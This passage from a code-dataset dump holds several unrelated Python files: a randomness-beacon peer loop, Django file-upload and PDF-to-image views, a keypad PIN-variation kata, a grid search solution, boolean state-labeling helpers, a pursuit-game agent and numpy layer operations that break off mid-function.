time.sleep(config['pkswait'])\n print(\"Node %s consumer starts\"%node.id)\n lastReconn = time.time()\n while True:\n\n if 
len(node.nodes_outbound)+len(node.nodes_inbound) < n-1: \n if time.time() - lastReconn > 5:\n node.reconnect_nodes() \n lastReconn = time.time()\n # time.sleep(0.5)\n # print(\"node%s connections %d node.reconnect_nodes()===========================================\"%(node.id, len(node.nodes_outbound)+len(node.nodes_inbound)))\n\n if node.epoch <= 2:\n starttime = time.time()\n\n # # if \"initial\" in node.msgs and node.curSeq[node.L] in node.msgs[\"initial\"]:\n # # print(len(node.msgs[\"initial\"][node.curSeq[node.L]]))\n time.sleep(config['consumerSleep']) \n if(node.newL == node.L):\n print(\"node.newL == node.L\",node.L)\n continue\n if node.newL not in node.curSeq:\n print(\"node.newL not in node.curSeq\")\n continue\n \n seq = \"ld_%sseq_%d\"%(node.newL, node.curSeq[node.newL])\n # print(\"node%s consume \"%node.id, seq)\n sent = \"sent_%s_%s\"%(\"ready\", seq)\n\n sent2 = \"mynode_%sseq_%d\"%(node.newL,node.curSeq[node.newL])\n if sent2 in sentDict: \n # print(\"%s has sent2 in sentDict\"%node.id,getattr(node, \"id\"), sent2, node.epoch, seq, node.newL)\n continue\n \n # if sent in node.msgs and node.msgs[sent] and \\ \n if \"initial\" in node.msgs and (seq in node.msgs[\"initial\"] and \\\n str(node.newL) in node.msgs[\"initial\"][seq]):# and \\\n # len(node.msgs[\"initial\"][seq][str(node.newL)])>=1 :\n\n sentDict[sent2]=True\n\n EC = node.msgs[\"initial\"][seq][str(node.newL)]\n # print(EC)\n sv = {'c_i': node.pvss.preRecon(EC['C'], self.ID)}\n sv['epoch'] = node.epoch\n sv['newepoch'] = node.epoch+1\n sv['L'] = node.newL\n sv['LQ']=list(node.LQ.all()) \n sv['seq'] = seq\n sv['Re_1'] = node.Re_1\n sv['ts'] = starttime\n sv['ts1'] = time.time()\n # print(\"%s start to consume %d's %dth ciphertext %s cost:%s\"%(node.id, node.newL, node.curSeq[node.newL], int(node.pvss.hash(EC))%100000, time.time()-starttime)) \n if sv['epoch'] not in node.cis['recon']:\n node.cis['recon'][sv['epoch']] = {}\n # if sv['epoch'] not in node.cis['reconEcho']:\n # node.cis['reconEcho'][sv['epoch']] = {}\n # if sv['epoch'] not in node.cis['reconReady']:\n # node.cis['reconReady'][sv['epoch']] = {}\n node.cis['recon'][sv['epoch']][node.id] = sv['c_i']\n node.send_to_nodes({\"type\": \"recon\", \"v\": json.dumps(sv)})\n else:\n # if sent not in node.msgs :\n # print(node.id,\"wait for \",sent)\n if seq not in node.msgs[\"initial\"]:\n print(node.id,\"wait for initial\",seq, \"connected nodes:%s\"%(len(node.nodes_outbound)+len(node.nodes_inbound))) \n else:\n if str(node.newL) not in node.msgs[\"initial\"][seq] :\n print(node.id,\"wait for newL\", str(node.newL), seq, \"connected nodes:%s\"%(len(node.nodes_outbound)+len(node.nodes_inbound))) \n else:\n print(node.id,\"wait for >1\", \"connected nodes:%s\"%(len(node.nodes_outbound)+len(node.nodes_inbound))) \n \n# from flask import Flask, render_template,request,jsonify,redirect,url_for,send_from_directory\n# class MyThread(threading.Thread):\n# def __init__(self, node):\n# super(MyThread, self).__init__()\n# self.node = node\n\n# def run(self): \n# app = Flask(__name__, template_folder = '.',static_folder='',static_url_path='')\n \n# @app.route('/',methods=[\"GET\"])\n# def index():\n# attr = request.args.get(\"attr\")\n# print(attr)\n# return jsonify({attr: json.dumps(getattr(self.node, attr))})\n# print(\"start flask server at\", port+1000)\n# app.run('0.0.0.0', port+1000)\n\n\nif __name__ == '__main__': \n peer = Peer(ID)\n peer.setDaemon(True)\n # app = MyThread(peer.node)\n # app.start()\n peer.start()\n # peer.join()\n 
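# Hypothetical local run (editor's sketch, not part of the original repo):\n    # launch one process per node id from config.py, e.g. \"python peer.py 1\",\n    # \"python peer.py 2\", ...; each peer connects to the higher-numbered peers,\n    # exchanges PVSS public keys, and the producer/consumer loops above then\n    # drive the randomness-beacon epochs.\n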
","repo_name":"AppCrypto/beacon","sub_path":"peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":23131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71386712233","text":"# Django Imports\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import MultiPartParser\nfrom django.http import JsonResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nimport io\nimport os\nimport PyPDF2\nimport base64\nimport fitz\nfrom PIL import Image as PILImage\nfrom PIL import ImageOps\nfrom pdf2image import convert_from_path\nfrom django.core.files.base import ContentFile\nfrom django.shortcuts import get_object_or_404\n\n# User Imports\nfrom .models import Image, PDF\nfrom .serializers import (\n ImageSerializer,\n ImageSerializerDetailed,\n PDFSerializer,\n PDFSerializerDetailed,\n)\nfrom .utils import get_num_pdf_pages, is_pdf, is_image\n\n\n\n# Views here\n\n@api_view([\"POST\"])\ndef upload_file(request):\n # Check HTTP Request\n if request.method != \"POST\":\n return JsonResponse(\n {\"error\": \"Invalid request method\"},\n status=status.HTTP_405_METHOD_NOT_ALLOWED,\n )\n\n # Read data from frontend\n encoded_file_data = request.data.get(\"file\")\n file_extension = request.data.get(\"extension\", \"\").lower()\n\n try:\n filename = encoded_file_data.name.split(\".txt\")[0]\n except AttributeError:\n filename = \"uploaded_file\"\n\n # Exception handle bad body data\n if not encoded_file_data or not file_extension:\n error_message = \"Missing file data or invalid extension\"\n return Response(\n {\"error\": error_message},\n status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,\n )\n\n # Decode the incomming Base64 file\n try:\n encoded_file_content = encoded_file_data.read()\n decoded_file_data = base64.b64decode(encoded_file_content)\n except:\n return Response(\n {\"error\": \"Invalid base64 file\"},\n status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,\n )\n\n serialized_data = None\n # Serialize the data with PDF Serializer\n if is_pdf(file_extension):\n # Wrap the decoded bytes in a BytesIO object\n pdf_io = io.BytesIO(decoded_file_data)\n num_pages = get_num_pdf_pages(pdf_io)\n serialized_data = PDFSerializerDetailed(\n data={\n \"file\": ContentFile(\n decoded_file_data, name=f\"{filename}.{file_extension}\"\n ),\n \"num_pages\": num_pages,\n }\n )\n # Serialize the data with Image Serializer\n elif is_image(file_extension):\n serialized_data = ImageSerializer(\n data={\n \"file\": ContentFile(\n decoded_file_data, name=f\"{filename}.{file_extension}\"\n )\n }\n )\n # Exception not Image or PDF\n else:\n return Response(\n {\"error\": \"Unsupported Media Type\"},\n status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,\n )\n\n # Save the serialized data if valid, and Add attributes neccessary after saving\n try:\n if serialized_data.is_valid():\n document = serialized_data.save()\n\n # Check if it is pdf, save in PDF table and calculate the PDF page height, width\n if is_pdf(file_extension):\n pdf_document = fitz.open(stream=decoded_file_data, filetype=\"pdf\")\n page = pdf_document[0] # First page\n page_width = page.bound().width\n page_height = page.bound().height\n pdf_document.close()\n\n # Update the PDF model instance with calculated values\n document.page_width = page_width\n document.page_height = page_height\n document.save()\n\n # Check if it is Image, save the Image instance and update its page height, 
width\n            elif is_image(file_extension):\n                with PILImage.open(document.file.path) as image:\n                    width, height = image.size\n                    number_of_channels = len(image.getbands())\n                # Update the image model instance with calculated values\n                document.width = width\n                document.height = height\n                document.number_of_channels = number_of_channels\n                document.save()\n\n            return Response(\n                {\"message\": \"File uploaded successfully\", \"document_id\": document.pk},\n                status=status.HTTP_200_OK,\n            )\n        # Error in serialized_data\n        else:\n            return JsonResponse(\n                {\"error\": \"Unsupported Media Type\"}, status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE\n            )\n\n    # Error in file format\n    except Exception:\n        return JsonResponse({\"error\": \"Unsupported Media Type\"}, status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)\n\n\n@api_view([\"GET\"])\ndef get_all_images(request):\n    images = Image.objects.all()\n    serializer = ImageSerializer(images, many=True)\n    return JsonResponse(serializer.data, safe=False)\n\n\n@api_view([\"GET\"])\ndef get_all_pdfs(request):\n    pdfs = PDF.objects.all()\n    serializer = PDFSerializer(pdfs, many=True)\n    return JsonResponse(serializer.data, safe=False)\n\n\n@api_view([\"GET\", \"DELETE\"])\ndef get_delete_image(request, id):\n    # Get image instance by ID, or return 404 if it does not exist\n    try:\n        image = Image.objects.get(id=int(id))\n    except (ObjectDoesNotExist, ValueError, TypeError):\n        return JsonResponse(\n            {\"error\": \"Image not found\"}, status=status.HTTP_404_NOT_FOUND\n        )\n\n    # Return detailed image by ID\n    if request.method == \"GET\":\n        serializer = ImageSerializerDetailed(image)\n        return JsonResponse(serializer.data, safe=False)\n\n    # Delete image and its file instance by ID\n    elif request.method == \"DELETE\":\n        image.file.delete()\n        image.delete()\n        return JsonResponse(\n            {\"message\": \"Image Deleted\"}, status=status.HTTP_204_NO_CONTENT\n        )\n\n\n@api_view([\"GET\", \"DELETE\"])\ndef get_delete_pdf(request, id):\n    # Get pdf instance by ID, or return 404 if it does not exist\n    try:\n        pdf = PDF.objects.get(id=int(id))\n    except (ObjectDoesNotExist, ValueError, TypeError):\n        return JsonResponse(\n            {\"error\": \"PDF not found\"}, status=status.HTTP_404_NOT_FOUND\n        )\n\n    # Return detailed pdf by ID\n    if request.method == \"GET\":\n        serializer = PDFSerializerDetailed(pdf)\n        return JsonResponse(serializer.data, safe=False)\n\n    # Delete pdf and its file instance by ID\n    elif request.method == \"DELETE\":\n        pdf.file.delete()\n        pdf.delete()\n        return JsonResponse(\n            {\"message\": \"PDF Deleted\"}, status=status.HTTP_204_NO_CONTENT\n        )\n\n\n@api_view([\"POST\"])\ndef rotate_image_view(request):\n    image_id = request.data.get(\"image_id\")\n    rotation_angle = request.data.get(\"rotation_angle\")\n\n    # Get image object, or return 404 if the ID does not exist\n    try:\n        image = Image.objects.get(id=int(image_id))\n    except (ObjectDoesNotExist, ValueError, TypeError):\n        return JsonResponse(\n            {\"error\": \"Image not found\"}, status=status.HTTP_404_NOT_FOUND\n        )\n\n    # Error handle if rotation angle is not a number\n    try:\n        rotation_angle = int(rotation_angle)\n    except ValueError:\n        return JsonResponse(\n            {\"error\": \"Invalid rotation angle\"}, status=status.HTTP_400_BAD_REQUEST\n        )\n\n    # Open the image as IO Bytes and create a PIL Image object\n    with io.BytesIO(image.file.read()) as photo_new_io:\n        pil_image = PILImage.open(photo_new_io)\n\n        # Rotate the image and allow expansion\n        rotated_image = pil_image.rotate(rotation_angle, expand=True)\n\n        # Convert the image to RGB mode\n        rotated_image = ImageOps.exif_transpose(rotated_image.convert(\"RGB\"))\n\n        # Resize if dimensions exceed the defined width and height\n        if image.width is not None and 
image.height is not None:\n if rotated_image.width > image.width or rotated_image.height > image.height:\n rotated_image.thumbnail((image.width, image.height))\n\n # Save the rotated image to IO Bytes\n rotated_image_io = io.BytesIO()\n rotated_image.save(rotated_image_io, format=\"JPEG\")\n\n # Overwrite the existing image file with the rotated image data\n with open(image.file.path, \"wb\") as f:\n f.write(rotated_image_io.getvalue())\n\n # Obtain the rotated image URL\n rotated_image_url = image.file.url\n return JsonResponse(\n {\n \"message\": \"Image rotated\",\n \"rotated_image_url\": rotated_image_url,\n },\n status=status.HTTP_200_OK,\n )\n\n\nfrom pdf2image import convert_from_path\nfrom django.conf import settings\n\n\n@api_view([\"POST\"])\ndef convert_pdf_to_image(request):\n pdf_id = request.data.get(\"pdf_id\")\n\n # Get the PDF object using the provided ID\n try:\n pdf = PDF.objects.get(id=int(pdf_id))\n except:\n return JsonResponse(\n {\"error\": \"PDF not found\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n # Convert the PDF to a list of images\n images = convert_from_path(pdf.file.path)\n # Generate a list of image paths to be returned after conversion\n generated_image_paths = []\n\n for i, image in enumerate(images):\n # Create the 'images' directory if it doesn't exist\n images_dir = \"images/\"\n\n # Extract the PDF file name\n pdf_name = os.path.basename(pdf.file.name)\n\n # Generate image filename with page number\n image_filename = f\"{pdf_name}_page{i+1}.jpg\"\n generated_image_path = os.path.join(images_dir, image_filename)\n\n # Save the image to the 'images' directory\n image.save(\"media/\" + generated_image_path, \"JPEG\")\n\n # Create Image instance in the database\n new_image_instance = Image.objects.create(file=generated_image_path, uploaded_at=pdf.uploaded_at)\n\n # Assign PDF page width, height, and channel values to the image instance\n new_image_instance.width = pdf.page_width\n new_image_instance.height = pdf.page_height\n new_image_instance.number_of_channels = 3 # Assuming RGB format\n\n # Save the updated image instance\n new_image_instance.save()\n\n\n # Add the generated image URL to the list\n generated_image_paths.append(\"/media/\" + generated_image_path)\n\n # Delete the original PDF file and PDF object\n pdf.file.delete()\n pdf.delete()\n\n # Return a success response with generated image paths\n return JsonResponse(\n {\n \"message\": \"PDF converted to image(s) successfully\",\n \"image_paths\": generated_image_paths,\n },\n status=status.HTTP_200_OK,\n )\n","repo_name":"hatemsayed98/Document-processing","sub_path":"myproject/documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39655476191","text":"\"\"\"\nAlright, detective, one of our colleagues successfully observed our target person, Robby the robber. We followed him to a secret warehouse, where we assume to find all the stolen stuff. The door to this warehouse is secured by an electronic combination lock. Unfortunately our spy isn't sure about the PIN he saw, when Robby entered it.\n\nThe keypad has the following layout:\n\n┌───┬───┬───┐\n│ 1 │ 2 │ 3 │\n├───┼───┼───┤\n│ 4 │ 5 │ 6 │\n├───┼───┼───┤\n│ 7 │ 8 │ 9 │\n└───┼───┼───┘\n │ 0 │\n └───┘\nHe noted the PIN 1357, but he also said, it is possible that each of the digits he saw could actually be another adjacent digit (horizontally or vertically, but not diagonally). E.g. 
instead of the 1 it could also be the 2 or 4. And instead of the 5 it could also be the 2, 4, 6 or 8.\n\nHe also mentioned, he knows this kind of locks. You can enter an unlimited amount of wrong PINs, they never finally lock the system or sound the alarm. That's why we can try out all possible (*) variations.\n\n* possible in sense of: the observed PIN itself and all variations considering the adjacent digits\n\nCan you help us to find all those variations? It would be nice to have a function, that returns an array (or a list in Java and C#) of all variations for an observed PIN with a length of 1 to 8 digits. We could name the function getPINs (get_pins in python, GetPINs in C#). But please note that all PINs, the observed one and also the results, must be strings, because of potentially leading '0's. We already prepared some test cases for you.\n\nDetective, we count on you!\n\"\"\"\n\n\nfrom itertools import product\n\n\ndef get_possibilities(num):\n D = {0: [1, 2, 3],\n 1: [4, 5, 6],\n 2: [7, 8, 9],\n 3: [None, 0, None]\n }\n r = None\n # find the row, that the number is in:\n for row, nums in D.items():\n if num in nums:\n r = row\n \n # Now get the index of the num:\n i = D[r].index(num)\n\n possib = []\n # get vert - index doesnt change: D[r][i] - r: row-1 to row+1\n row_start = r - 1 if r != 0 else r\n row_end = r + 1 if r != 3 else r\n for R in range(row_start, row_end+1):\n if D[R][i] != None and D[R][i] not in possib:\n possib.append(D[R][i])\n \n # get horiz - Row doesnt change: D[r][i]: index goes from i-1 to i+1\n i_start = i - 1 if i != 0 else i\n i_end = i + 1 if i != 2 else i\n for I in range(i_start, i_end + 1):\n if D[r][I] != None and D[r][I] not in possib:\n possib.append(D[r][I]) \n \n return possib\n\n\n\ndef get_pins(observed):\n P = []\n res = []\n for i in observed:\n P.append(get_possibilities(int(i)))\n \n for ans in product(*P):\n res.append((\"\".join(map(str, ans))))\n\n return res\n\nx = get_pins(\"1234\")\nprint(x)\n\n\n\n\n\n","repo_name":"jkfer/Codewars","sub_path":"The_Observed_PIN.py","file_name":"The_Observed_PIN.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28457417758","text":"import sys\r\nimport math\r\nsys.stdin = open('input.txt', 'r')\r\nN = int(sys.stdin.readline())\r\ngraph = []\r\nfor _ in range(N):\r\n graph.append(list(sys.stdin.readline().rstrip()))\r\nheight = []\r\nfor _ in range(N):\r\n height.append(list(map(int, sys.stdin.readline().split())))\r\n\r\nhomes = 0\r\nfor i in range(N):\r\n for j in range(N):\r\n if graph[i][j] == 'P':\r\n p = (i, j)\r\n elif graph[i][j] == 'K':\r\n homes += 1\r\n\r\ndx = [1, 0, -1, 0, 1, 1, -1, -1]\r\ndy = [0, 1, 0, -1, 1, -1, 1, -1]\r\n\r\nh = []\r\nfor i in range(N):\r\n for j in range(N):\r\n if height[i][j] not in h:\r\n h.append(height[i][j])\r\nh.sort()\r\nprint(h)\r\nans = math.inf\r\nleft, right = 0, 0\r\nwhile left <= right:\r\n cnt = 0\r\n visited = [[False]*N for _ in range(N)]\r\n print(left, right)\r\n if h[left] <= height[p[0]][p[1]] <= h[right]:\r\n visited[p[0]][p[1]] = True\r\n stack = [p]\r\n while stack:\r\n x, y = stack.pop()\r\n if graph[x][y] == 'K':\r\n cnt += 1\r\n for i in range(8):\r\n nx, ny = x+dx[i], y+dy[i]\r\n if 0 <= nx < N and 0 <= ny < N and not visited[nx][ny]:\r\n if h[left] <= height[nx][ny] <= h[right]:\r\n visited[nx][ny] = True\r\n stack.append([nx, ny])\r\n if cnt == homes:\r\n ans = min(ans, h[right]-h[left])\r\n left += 1\r\n else:\r\n if right == 
len(h)-1:\r\n break\r\n right += 1\r\nprint(ans)","repo_name":"park-hg/algorithm-study","sub_path":"dfs,bfs/2842.py","file_name":"2842.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18125853969","text":"#! /usr/bin/env python\n\nfrom .agent import Agent\nfrom termcolor import colored\n\n\nclass TargetAgent(Agent):\n\t\n\t_target: str\n\t\n\tdef __init__(self, a_id: str, agent_type: int, rank: int = 0):\n\t\t\n\t\tsuper().__init__(a_id, agent_type, rank)\n\t\tself._target = ''\n\t\t\n\t@property\n\tdef target(self) -> str:\n\t\treturn self._target\n\t\n\t@target.setter\n\tdef target(self, new_target: str) -> None:\n\t\tself._target = new_target\n\t\t\n\tdef get_reward(self, raw_reward: float, **extra_info) -> float:\n\t\t\n\t\tenv = extra_info.get(\"env\")\n\t\tif self._target == '':\n\t\t\tprint(colored('No target prey defined, defaulting to base Agent reward', 'yellow'))\n\t\t\treturn super().get_reward(raw_reward, **extra_info)\n\t\tif env is None:\n\t\t\tprint(colored('No environment provided, defaulting to base Agent reward', 'yellow'))\n\t\t\treturn super().get_reward(raw_reward, **extra_info)\n\t\tprey = env.agents[self._target]\n\t\thunter = env.agents[self._id]\n\t\tprey_adj_pos = [(prey.pos[0] - 1, prey.pos[1]), (prey.pos[0] + 1, prey.pos[1]), (prey.pos[0], prey.pos[1] - 1), (prey.pos[0], prey.pos[1] + 1)]\n\t\t\n\t\tif prey.alive and raw_reward > 0 and hunter.pos not in prey_adj_pos:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn raw_reward","repo_name":"miguel-faria/deep_rl","sub_path":"src/dl_envs/pursuit/agents/target_agent.py","file_name":"target_agent.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29671371719","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2021/12/15 14:37\n# @Author : RooFTOooOP\n# @FileName: 正则表达式.py\n# @Software: PyCharm\n\nimport re\n\ndata = ('Mountain View, CA 94040', 'Sunnyvale, CA', 'Los Altos, 94023')\nfor d in data:\n print(re.split(r', +| +(?=(?:\\d{5}|[A-Z]{2}))', d))\n\n","repo_name":"Wang-wenting/MyPythonCode","sub_path":"python高级编程/正则表达式/正则表达式.py","file_name":"正则表达式.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14340077183","text":"\n\ndef label_state(state, functions=None, node_names=None, str_functions=None, additive=True, sep='/', no_label=\"*\"):\n\n \"\"\"\n Return the label of a state given a set of labeling functions. 
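A labeling function maps an ordered state vector to True or False. 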
Labels are additive, if more than one function applies all labels will be added.\n\n Arguments\n ---------\n state (list): state to label, most be ordered according to original node_names\n functions (dic, optional): dictionary of label with its respective boolean function\n node_names (list, optional): ordered name of nodes\n str_functions (str, optional): multiline string of boolean functions.\n format: label = boolean labeling function\n additive (bool, optional): use all appropiate labels, if false only the first label will be used\n sep (string, optional): string to separate multiple labels\n\n Returns\n -------\n label (str): label of state\n \"\"\"\n\n state = [int(s) for s in state] #clean state\n if functions == None: functions = create_label_functions(node_names, str_functions) #create functions if none given\n\n label = []\n for f in functions: #evaluate functions to find apliable labels\n if functions[f](state): label.append(f)\n if len(label) == 0: return no_label\n if additive: \n label = list(set(label)) #remove duplicates\n return sep.join(label) \n else: return label[0]\n\n\ndef create_label_functions(node_names, data):\n \"\"\"\n Declare labeling function from a multiline string of boolean functions.\n\n Arguments\n ---------\n node_names (list of str): names of the nodes in order\n data (str): multiline string of boolean functions.\n format: label = boolean labeling function\n\n Returns\n -------\n functions (dic): dictionary of label with its respective boolean function\n \"\"\"\n\n functions = {}\n data = data.strip().split('\\n')\n data = [x.strip() for x in data if not x.strip().startswith('#')] #remove comented lines\n\n #generate functions\n for d in data:\n d = d.split('=')\n #generate lambda function\n node_lambda = eval(\"lambda (\" +','.join(node_names) +') : ' +d[1].strip()) \n #declare function\n functions [d[0].strip()] = node_lambda\n\n return functions","repo_name":"mar-esther23/regnet","sub_path":"regnet/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24415353908","text":"import numpy as np\n\n# Attension:\n# - Never change the value of input, which will change the result of backward\n\n\nclass operation(object):\n \"\"\"\n Operation abstraction\n \"\"\"\n\n def forward(self, input):\n \"\"\"Forward operation, reture output\"\"\"\n raise NotImplementedError\n\n def backward(self, out_grad, input):\n \"\"\"Backward operation, return gradient to input\"\"\"\n raise NotImplementedError\n\n\nclass relu(operation):\n def __init__(self):\n super(relu, self).__init__()\n\n def forward(self, input):\n output = np.maximum(0, input)\n return output\n\n def backward(self, out_grad, input):\n in_grad = (input >= 0) * out_grad\n return in_grad\n\n\nclass flatten(operation):\n def __init__(self):\n super(flatten, self).__init__()\n\n def forward(self, input):\n batch = input.shape[0]\n output = input.copy().reshape(batch, -1)\n return output\n\n def backward(self, out_grad, input):\n in_grad = out_grad.copy().reshape(input.shape)\n return in_grad\n\n\nclass matmul(operation):\n def __init__(self):\n super(matmul, self).__init__()\n\n def forward(self, input, weights):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n\n # Returns\n output: numpy array with shape(batch, out_features)\n \"\"\"\n return np.matmul(input, weights)\n\n def 
backward(self, out_grad, input, weights):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of fc layer, with shape (batch, out_features)\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n\n # Returns\n in_grad: gradient to the forward input with same shape as input\n w_grad: gradient to weights, with same shape as weights \n \"\"\"\n in_grad = np.matmul(out_grad, weights.T)\n w_grad = np.matmul(input.T, out_grad)\n return in_grad, w_grad\n\n\nclass add_bias(operation):\n def __init__(self):\n super(add_bias, self).__init__()\n\n def forward(self, input, bias):\n '''\n # Arugments\n input: numpy array with shape (batch, in_features)\n bias: numpy array with shape (in_features)\n\n # Returns\n output: numpy array with shape(batch, in_features)\n '''\n return input + bias.reshape(1, -1)\n\n def backward(self, out_grad, input, bias):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of fc layer, with shape (batch, out_features)\n input: numpy array with shape (batch, in_features)\n bias: numpy array with shape (out_features)\n # Returns\n in_grad: gradient to the forward input with same shape as input\n b_bias: gradient to bias, with same shape as bias\n \"\"\"\n in_grad = out_grad\n b_grad = np.sum(out_grad, axis=0)\n return in_grad, b_grad\n\n\nclass fc(operation):\n def __init__(self):\n super(fc, self).__init__()\n self.matmul = matmul()\n self.add_bias = add_bias()\n\n def forward(self, input, weights, bias):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n bias: numpy array with shape (out_features)\n\n # Returns\n output: numpy array with shape(batch, out_features)\n \"\"\"\n output = self.matmul.forward(input, weights)\n output = self.add_bias.forward(output, bias)\n # output = np.matmul(input, weights) + bias.reshape(1, -1)\n return output\n\n def backward(self, out_grad, input, weights, bias):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of fc layer, with shape (batch, out_features)\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n bias: numpy array with shape (out_features)\n\n # Returns\n in_grad: gradient to the forward input of fc layer, with same shape as input\n w_grad: gradient to weights, with same shape as weights\n b_bias: gradient to bias, with same shape as bias\n \"\"\"\n # in_grad = np.matmul(out_grad, weights.T)\n # w_grad = np.matmul(input.T, out_grad)\n # b_grad = np.sum(out_grad, axis=0)\n out_grad, b_grad = self.add_bias.backward(out_grad, input, bias)\n in_grad, w_grad = self.matmul.backward(out_grad, input, weights)\n return in_grad, w_grad, b_grad\n\n\nclass conv(operation):\n def __init__(self, conv_params):\n \"\"\"\n # Arguments\n conv_params: dictionary, containing these parameters:\n 'kernel_h': The height of kernel.\n 'kernel_w': The width of kernel.\n 'stride': The number of pixels between adjacent receptive fields in the horizontal and vertical directions.\n 'pad': The number of pixels padded to the bottom, top, left and right of each feature map. 
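With this padding, the spatial output size is out = (in + 2*pad - kernel) // stride + 1 along each axis. 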
Here, pad = 2 means a 2-pixel border of padded with zeros\n 'in_channel': The number of input channels.\n 'out_channel': The number of output channels.\n \"\"\"\n super(conv, self).__init__()\n self.conv_params = conv_params\n\n def forward(self, input, weights, bias):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n weights: numpy array with shape (out_channel, in_channel, kernel_h, kernel_w)\n bias: numpy array with shape (out_channel)\n\n # Returns\n output: numpy array with shape (batch, out_channel, out_height, out_width)\n \"\"\"\n kernel_h = self.conv_params['kernel_h'] # height of kernel\n kernel_w = self.conv_params['kernel_w'] # width of kernel\n pad = self.conv_params['pad']\n stride = self.conv_params['stride']\n in_channel = self.conv_params['in_channel']\n out_channel = self.conv_params['out_channel']\n\n output = None\n\n #########################################\n\n \n batch, _, in_height, in_width = input.shape\n\n wid_out = 1+ (input.shape[3] + 2 * pad - kernel_w) // stride # 2D conv outshape\n\n hei_out = 1+ (input.shape[2] + 2 * pad - kernel_h) // stride # 2D conv outshape\n \n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n from utils import tools\n\n img = tools.img2col(in_pad, [i*stride for i in range(hei_out)],\n [i*stride for i in range(wid_out)], kernel_h, kernel_w)\n \n output = (np.matmul(weights.reshape(out_channel, -1), img.transpose(1, 2, 0)\n .reshape(in_channel * kernel_h * kernel_w, -1)) + bias.reshape(-1, 1))\\\n .reshape(out_channel, hei_out, wid_out, batch).transpose(3, 0, 1, 2)\n \n \n\n \n #########################################\n\n return output\n\n def backward(self, out_grad, input, weights, bias):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of conv layer, with shape (batch, out_channel, out_height, out_width)\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n weights: numpy array with shape (out_channel, in_channel, kernel_h, kernel_w)\n bias: numpy array with shape (out_channel)\n\n # Returns\n in_grad: gradient to the forward input of conv layer, with same shape as input\n w_grad: gradient to weights, with same shape as weights\n b_bias: gradient to bias, with same shape as bias\n \"\"\"\n kernel_h = self.conv_params['kernel_h'] \n kernel_w = self.conv_params['kernel_w'] \n pad = self.conv_params['pad']\n stride = self.conv_params['stride']\n in_channel = self.conv_params['in_channel']\n out_channel = self.conv_params['out_channel']\n\n in_grad = None\n w_grad = None\n b_grad = None\n\n #########################################\n\n \n \n \n \n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n wid_out = 1+ (input.shape[3] + 2 * pad - kernel_w) // stride # 2D conv outshape\n\n hei_out = 1+ (input.shape[2] + 2 * pad - kernel_h) // stride # 2D conv outshape\n\n batch, _, hei_out, wid_out = out_grad.shape\n \n p=pad\n \n from utils import tools\n \n b_grad = np.sum(out_grad, axis=(0, 2, 3))\n \n img = tools.img2col(in_pad, [i * stride for i in range(hei_out)],\n [i * stride for i in range(wid_out)], kernel_h, kernel_w)\n \n w_grad = (out_grad.transpose(1, 2, 3, 0).reshape(out_channel, -1) @ img.transpose(1, 2, 0)\n .reshape(in_channel*kernel_h*kernel_w, -1).T).reshape(weights.shape)\n\n reshape_col = weights.reshape(out_channel, -1).T @ out_grad.transpose(1, 2, 3, 0).reshape(out_channel, -1)\n\n reshape_col2 =reshape_col .reshape(in_channel * kernel_w * kernel_h, -1, 
